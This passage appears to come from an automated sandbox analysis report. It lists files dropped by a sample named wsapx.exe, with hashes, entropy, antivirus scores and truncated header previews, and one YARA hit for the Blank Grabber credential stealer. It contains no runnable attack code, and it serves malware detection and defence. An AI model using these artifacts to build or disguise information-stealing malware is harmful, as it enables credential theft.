                                                                                                                                                                                                                                              Entropy (8bit):7.917277859124498
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:cjQY6vZR307kwHMn3NsbM5PlvQzSqoSdPN1uruZkU2D90nGt4pcgIGZ1rA7SyTx7:EQY6nEZe3NsbI1QzSwlaugudNIGZ1rAP
                                                                                                                                                                                                                                              MD5:BC2EBD2A95619AB14A16944B0AB8BDE5
                                                                                                                                                                                                                                              SHA1:C31BA45B911A2664FC622BB253374AB7512FC35A
                                                                                                                                                                                                                                              SHA-256:AEB3FD8B855B35204B5088C7A1591CC1CA78FFFE707D70E41D99564B6CB617C6
                                                                                                                                                                                                                                              SHA-512:86A6685EFEC72860991C0F0FA50F46A208211D3F8FC44012B12437D141C5F1A24C34A366F164D225869680707B482AB27A2720C698EBE8026F1C5807E81F8437
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........TB#.5,p.5,p.5,p.M.p.5,p.I-q.5,p.I)q.5,p.I(q.5,p.I/q.5,pnH-q.5,p.M-q.5,p.5-p.5,pnH!q.5,pnH,q.5,pnH.p.5,pnH.q.5,pRich.5,p........PE..d......e.........." ...#. ...............................................................`.........................................4...L....................P.........................................................@...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26904
                                                                                                                                                                                                                                              Entropy (8bit):7.418027428269828
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:Xzh/iDHAPcpqyIGQUNz5YiSyvHAMxkEJ5YSv:jhiDHAP5yIGQUN97SyPx/Y+
                                                                                                                                                                                                                                              MD5:FCBB24550F59068A37EA09A490923C8A
                                                                                                                                                                                                                                              SHA1:1E51D9C156354E00909C9F016DDB392A832F8078
                                                                                                                                                                                                                                              SHA-256:DE2AC6D99234A28DCF583D90DCA7256DE986FCA9E896C9AAFD1F18BB536978B8
                                                                                                                                                                                                                                              SHA-512:62474BF9D5F39591240F71FD9270FCC7A2B2C0B4A1F93CBB57021040AD85B3AB8C401D17AEDF0141105118772F453C6137A026736F069CC7A965CB30E5479F07
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B:W\.[9..[9..[9..#...[9..'8..[9..'<..[9..'=..[9..':..[9..&8..[9.M#8..[9..[8.M[9..&4..[9..&9..[9..&...[9..&;..[9.Rich.[9.........................PE..d...Y..e.........." ...#.0...............................................................`.............................................L.......P............`..............<..........................................@...........................................UPX0....................................UPX1.....0.......*..................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):45336
                                                                                                                                                                                                                                              Entropy (8bit):7.7177626825594965
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:O1X8HEfobVbgwsIZsQD182/q2vQttkmnIzPnzTpwOgIGLwgBT5YiSyvvBAMxkEn:CXz0gwsGsQD1ZbmiSOgIGLwgBd7SyZxL
                                                                                                                                                                                                                                              MD5:F6D0876B14BCA5A264EC231895D80072
                                                                                                                                                                                                                                              SHA1:D68B662CFC247C07851EF0764FE9652E3E2C0981
                                                                                                                                                                                                                                              SHA-256:BCBF9A952473E53F130CE77B0DB69FE08C5845CE10DBE8C320B40F171A15D6A8
                                                                                                                                                                                                                                              SHA-512:1DB02975634FFCC4E73FAC355D7F67A915C3B4189FEAF9E7B24EF831E9F4A2E60A4BD1EBFD8157282A4094814332D62957FCD204B20F2904527E203AB355AB8E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J./.+z|.+z|.+z|.S.|.+z|.W{}.+z|.W.}.+z|.W~}.+z|.Wy}.+z|}V{}.+z|.+{|.+z|.S{}.+z|}Vw}.+z|}Vz}.+z|}V.|.+z|}Vx}.+z|Rich.+z|................PE..d......e.........." ...#.p.......... q....................................................`.........................................D...P....................0......................................................0}..@...........................................UPX0....................................UPX1.....p.......p..................@....rsrc................t..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):59160
                                                                                                                                                                                                                                              Entropy (8bit):7.835515959807496
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:e5ovI/e3wTAiHXhchuXbLfbmmKTnjBChRDLHKVIGOQQm7Syxx2e:e5fXAcew9KTjBCh1kIGOQQml
                                                                                                                                                                                                                                              MD5:0FDEDCB9B3A45152239CA4B1AEA4B211
                                                                                                                                                                                                                                              SHA1:1CCFF1F5E7B27C4156A231AD7A03BCC9695C5B92
                                                                                                                                                                                                                                              SHA-256:0FC03D25467850181C0FC4F0F8919C8C47CBA2BF578698D4354AA84FD810C7F7
                                                                                                                                                                                                                                              SHA-512:8CE5B38EE64AC0CDA831B6B2C746FB95BAADDA83665D8E125EAA8B4A07CB61B3EF88D60741B978B2108EC08B067F1C9C934099F539B1E24F55E3CA8350359611
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@.g...g...g.......g..../..g......g....+..g....*..g....-..g..q./..g..../..g...g/..f..q.#..g..q....g..q...g..q.,..g..Rich.g..........PE..d......e.........." ...#.........p.. ........................................@............`..........................................;..P....9.......0..........8............;...................................... %..@...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):67352
                                                                                                                                                                                                                                              Entropy (8bit):7.856108604878049
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:URuyAdinkEweTTDWPnQfNnPAdu8LfPXrBIGC777m7Synx5:2F9fEo58DPXdIGC77yN
                                                                                                                                                                                                                                              MD5:53996068AE9CF68619DA8CB142410D5E
                                                                                                                                                                                                                                              SHA1:9EB7465D6F22AB03DAC04CFCE668811A87E198F2
                                                                                                                                                                                                                                              SHA-256:CBD320C42277086CD962FD0B25842904CEB436346D380319625F54363F031DCF
                                                                                                                                                                                                                                              SHA-512:D5FBC53A2FFFECB1F3DA4B126E306961DE3B8070B5F722B6ED5E20BEF6AF48D52EDF96C975F68278E337BC78A25B4227E9EB44B51BAA786365A67CF977E4643E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........U.k.4.8.4.8.4.8.L)8.4.8.H.9.4.8.H.9.4.8.H.9.4.8.H.9.4.8kI.9.4.8.4.8#5.8.L.9.4.8kI.9.4.8kI.9.4.8kIE8.4.8kI.9.4.8Rich.4.8........................PE..d......e.........." ...#.........@.......P...................................0............`.........................................l,..d....)....... ..........8............,..........................................@...........................................UPX0.....@..............................UPX1.........P......................@....rsrc........ ......................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1329520
                                                                                                                                                                                                                                              Entropy (8bit):5.586655762137983
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:uttcY+b+vOmgRF1+fYNXPh26UZWAzCu7j5D95wdgkVodYOPjwwMJ9gCCaYc2I:uttcY+mHCiCA5TNqodYOPEPEaYc2I
                                                                                                                                                                                                                                              MD5:898E35281A756640780DBC31A0B78452
                                                                                                                                                                                                                                              SHA1:845B59CFD9FB152725F250A872E9D1D7A66AF258
                                                                                                                                                                                                                                              SHA-256:0DAA440C78582A693DABBC2325A06D817131BB170BAD436B126BAD896F1377CD
                                                                                                                                                                                                                                              SHA-512:421CC4A15E94293E53F1039B8BB5BE7EDCBC8E3E0E4ABC7F34FAF991993F51CB5F51493B58BB341CB9579347EC134B02104454075A8E7E33E45B8E3A66A44D79
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:PK..........!.x[_C............_collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z*..e*........Z*..e.e*........Z+e*jY............................[*d...Z-..e-........
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):118027
                                                                                                                                                                                                                                              Entropy (8bit):7.698356724097063
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:B9JWp8bQqPBPzPjKOwARekWb/QNIb+vKJZEcBXGKRvZacnSpFTU+kEiJ2dwPPRD4:y8h/zNdOYNIgaZ3NGU0w1Eldw3nZc
                                                                                                                                                                                                                                              MD5:0F87C27F0C81666BF048C739C1AB6227
                                                                                                                                                                                                                                              SHA1:AB310C21491E3D150CEDF8B82F8113427BBA8DB3
                                                                                                                                                                                                                                              SHA-256:A4B0A05F1B62A5F373F5A8ECD77A3AC9685E69BFFC9FCF9A1BDE6E40A786E0DE
                                                                                                                                                                                                                                              SHA-512:2327D28B3CAA79B85334F9D69C56477F8CF2C1A8CF417B735DEC0883F02689FD72F750BA2C41549A24E094272DE1F43018FCBF3EE9B7041A793D6DDEA613F2EE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:PK........&..YC.u............stub-o.pyc..........Ug.(...............................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1629464
                                                                                                                                                                                                                                              Entropy (8bit):7.952620301087112
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:AMyDwbv70aKbP1zkLO5YHLA1CPwDvt3uFlDCZ:kwbv77KbPaqYHLA1CPwDvt3uFlDCZ
                                                                                                                                                                                                                                              MD5:27515B5BB912701ABB4DFAD186B1DA1F
                                                                                                                                                                                                                                              SHA1:3FCC7E9C909B8D46A2566FB3B1405A1C1E54D411
                                                                                                                                                                                                                                              SHA-256:FE80BD2568F8628032921FE7107BD611257FF64C679C6386EF24BA25271B348A
                                                                                                                                                                                                                                              SHA-512:087DFDEDE2A2E6EDB3131F4FDE2C4DF25161BEE9578247CE5EC2BCE03E17834898EB8D18D1C694E4A8C5554AD41392D957E750239D3684A51A19993D3F32613C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./',.kFB.kFB.kFB.b>..yFB..:C.iFB..:G.gFB..:F.cFB..:A.oFB.kFC..FB. >C.`FB.;A.KFB.;F..EB.;B.jFB.;..jFB.;@.jFB.RichkFB.........................PE..d...x..e.........." ...#. .......`9.0{O..p9.................................. R...........`......................................... .O......O.h.....O.......K.\.............R.......................................O.@...........................................UPX0.....`9.............................UPX1..... ...p9.....................@....rsrc.........O.....................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):29968
                                                                                                                                                                                                                                              Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                                              MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                                              SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                                              SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                                              SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):229144
                                                                                                                                                                                                                                              Entropy (8bit):7.930038440560372
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:SFfmvsqWLSCMT+MyN6Qp2oZqpN+/fvrqknqbf6CjaBGkfPkZAK1ck2kBVfLwOmFd:SFevsT9JN+vyH1nqLr3CPrYBBRcd
                                                                                                                                                                                                                                              MD5:6EDA5A055B164E5E798429DCD94F5B88
                                                                                                                                                                                                                                              SHA1:2C5494379D1EFE6B0A101801E09F10A7CB82DBE9
                                                                                                                                                                                                                                              SHA-256:377DA6175C8A3815D164561350AE1DF22E024BC84C55AE5D2583B51DFD0A19A8
                                                                                                                                                                                                                                              SHA-512:74283B4051751F9E4FD0F4B92CA4B953226C155FE4730D737D7CE41A563D6F212DA770E96506D1713D8327D6FEF94BAE4528336EBCFB07E779DE0E0F0CB31F2E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T..T..T..].3.Z....V......V....X....\....P....W..T..I....e....U.._.U....U..RichT..........PE..d......e.........." ...#.....P...p...r....................................................`............................................,C......8............ ..pM...................................................~..@...........................................UPX0.....p..............................UPX1................................@....rsrc....P.......L..................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1826072
                                                                                                                                                                                                                                              Entropy (8bit):7.993990461497291
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:49152:fTBxkJIkNEakpCPK1JQyHi3p70PHY6/g7:teFNlUsK1ij31WYUW
                                                                                                                                                                                                                                              MD5:86D9B8B15B0340D6EC235E980C05C3BE
                                                                                                                                                                                                                                              SHA1:A03BDD45215A0381DCB3B22408DBC1F564661C73
                                                                                                                                                                                                                                              SHA-256:12DBBCD67015D6CDB680752184107B7DEB84E906B0E8E860385F85D33858A5F6
                                                                                                                                                                                                                                              SHA-512:D360CC3F00D90FD04CBBA09D879E2826968DF0C1FDC44890C60B8450FE028C3E767450C3543C62D4F284FB7E004A9A33C52538C2279221EE6CBDB1A9485F88B2
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................m.................x...s...x......x......x......Rich............PE..d...=..e.........." ...#.........@Q...l..PQ...................................m...........`.........................................H/l......)l...... l......``..V............l. ...........................0.l.(...p.l.@...........................................UPX0.....@Q.............................UPX1.........PQ.....................@....rsrc........ l.....................@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):630736
                                                                                                                                                                                                                                              Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                                              MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                                              SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                                              SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                                              SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):456
                                                                                                                                                                                                                                              Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                                              MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                                              SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                                              SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                                              SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26392
                                                                                                                                                                                                                                              Entropy (8bit):7.448215150146329
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:qnyukFaypXM5IGQGNf5YiSyvTcAMxkEMrX:qnGAaM5IGQGNR7Syb6xuX
                                                                                                                                                                                                                                              MD5:CCE3E60EC05C80F5F5EE014BC933554C
                                                                                                                                                                                                                                              SHA1:468D2757B201D6259034215CFD912E8E883F4B9E
                                                                                                                                                                                                                                              SHA-256:84A81CCA6D80EDD9EC2D31926231DE393ED7F26ED86AE39219ADC5EAB24B8100
                                                                                                                                                                                                                                              SHA-512:7CBCEE4DD4C817FBEF8B9AEF2D457B56970C5E5C03BDF2CAF74415316B44E7DA33EE39B6A434F4760C80F74C33B5C0C5AD00936D438B947A39FFCD53E890CF0C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........t.q|'.q|'.q|'...'.q|'q.}&.q|'q.y&.q|'q.x&.q|'q..&.q|'..}&.q|'.q}'.q|'..}&.q|'..q&.q|'..|&.q|'...'.q|'..~&.q|'Rich.q|'........PE..d...Z..e.........." ...#.0................................................................`......................................... ...L....................`..............l..........................................@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):637720
                                                                                                                                                                                                                                              Entropy (8bit):7.993319352541641
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:12288:kevMEHnoed8VDT4Rc+iHsLG56RY+hPQHAnxeIglZsk2F24ZHL2Ubsi2UTwYqmH:k8oy8x4Rl1dRnxeDlZxsl2MsD0w9mH
                                                                                                                                                                                                                                              MD5:C6ED91B8FDB99EBA4C099EB6D0EEA5D9
                                                                                                                                                                                                                                              SHA1:915B2D004F3F07CD18610E413B087568258DA866
                                                                                                                                                                                                                                              SHA-256:E6E1910E237AC7847748918804D1C414C0F1696A29E9718739312A233EB96D80
                                                                                                                                                                                                                                              SHA-512:92FE738FCD75E39C6BC9F1EDB3B16A1A7CF3AE6C0D2C29C721B1A5BD3E07A4BB8E8295B3AD3CB44BCEE05A8110855B0FEA66B156461C4F1761C53C15D7E67EE5
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W..W..W..^.P.[....U....Z...._.....S.....T..W........V.....V....<.V......V..RichW..........................PE..d......e.........." ...#.`...0.......*.......................................p............`..........................................K..."...H.......@.......................m.......................................7..@...........................................UPX0....................................UPX1.....`.......Z..................@....rsrc....0...@.......^..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):302872
                                                                                                                                                                                                                                              Entropy (8bit):7.986491235737331
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:OtX6biS7ltWh4BvaEyS+KPUR30JlSEwV7hqoUnJG4qKOF6J:OZLS5YiyEFPPl3yqrJG4V06J
                                                                                                                                                                                                                                              MD5:427668E55E99222B3F031B46FB888F3A
                                                                                                                                                                                                                                              SHA1:C9BE630CB2536C20BBC6FC9BA4A57889CDB684BC
                                                                                                                                                                                                                                              SHA-256:9CA1B01048D3867CB002A01A148F279BA9EDAF7B7AD04D17E3E911E445F2D831
                                                                                                                                                                                                                                              SHA-512:E5CA0DDC2758891090DB726DE2D3FD7F2BA64E309979136B4D3299445B1F751DFD8CD56BB3343499CB6ED479C08732D1D349D32B7F7E5AC417352BD0CE676253
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w...3m..3m..3m..:...5m......1m......>m......;m......0m......0m..x...1m..3m..cm......2m......2m....j.2m......2m..Rich3m..................PE..d...]..e.........." ...#.`.......0.......@................................................`.............................................X....................@..........................................................@...........................................UPX0.....0..............................UPX1.....`...@...^..................@....rsrc................b..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
